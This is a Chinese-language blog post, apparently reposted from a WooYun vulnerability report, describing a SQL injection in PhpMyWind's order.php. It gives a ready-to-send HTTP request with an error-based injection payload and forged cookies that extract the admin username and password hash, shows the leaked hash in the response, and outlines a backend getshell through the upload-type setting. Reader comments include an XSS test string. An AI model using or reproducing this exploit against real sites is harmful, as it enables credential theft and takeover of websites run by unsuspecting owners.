PhpMyWind最新版本注入+后台getshell

转自http://wooyun.org/bugs/wooyun-2010-051256

洞主文中没说清楚,厂商也忽略了。

简要分析如下

漏洞出在/order.php中

[php]

function GetTopType($tbname='', $tbname2='', $colname='', $id=0, $i=0)
{
global $dosql;

if(isset($_GET['id']))
{
$r = $dosql->GetOne("SELECT `$colname` FROM `$tbname2` WHERE `id`=".$_GET['id']);//没过滤
}
...

[/php]

不过要利用这处漏洞需要绕过下面的代码

[php]

//初始化购物车字符串
if(empty($_COOKIE['shoppingcart']))
{
header('location:shoppingcart.php');
exit();
}

//不允许游客下单跳转登陆
if(empty($_COOKIE['username']))
{
header('location:member.php?c=login');
exit();
}

[/php]

绕过也很简单,Cookie设置一下即可。
利用:

[php]

GET /order.php?id=-@`'`%20UnIon%20select%20username%20from%20`pmw_admin`%20where%20(select%201%20from%20(select%20count(*)%20,concat(0x7c,(select%20concat(username,0x3a,password)%20from%20pmw_admin%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20id=@`'` HTTP/1.1
Host: 0day5.com
Cookie: shoppingcart=a;username=b

 

[/php]

响应包结果:

[php]
duplicate entry '|admin:c3284d0f94606de1fd2af172aba15bf3|1' for key 'group_key' Error sql: SELECT `getmode` FROM `pmw_goodsorder` WHERE `id`=-@`'` UnIon select username from `pmw_admin` where (select 1 from (select count(*) ,concat(0x7c,(select concat(username,0x3a,password) from pmw_admin limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and id=@`'

[/php]

---------------------------

附一则后台getshell办法(windows服务器)

网站系统管理——网站信息配置——附件设置

上传图片类型

111

然后在Burp中

222

 

over.

8 条评论

  1. [...]反正扫描没啥东西,找下它的漏洞,经过一番测试感觉order.php有问题 发现这个漏洞:http://0day5.com/archives/1442/ 测试吧,加两个cookie先试试能找到点不能,发现订单[...]

  2. 1233211234567

    :cool: :arrow: :mrgreen:

  3. 你民

    :lol: :mad: :alert(/xss/): :idea: :mrgreen:

    1. 0day5
      @你民

      javasrcript:document.write(alert(/xss/))

  4. 牛牪犇

    没看明白怎么使用!!

    1. 0day5
      @牛牪犇

      就是在cookie中保持shoppingcart和username的值不为空,就可以继续注入了

      1. xy
        @0day5

        就是cookie那段不知道怎么使用,还是在哪里使用 ==

发表评论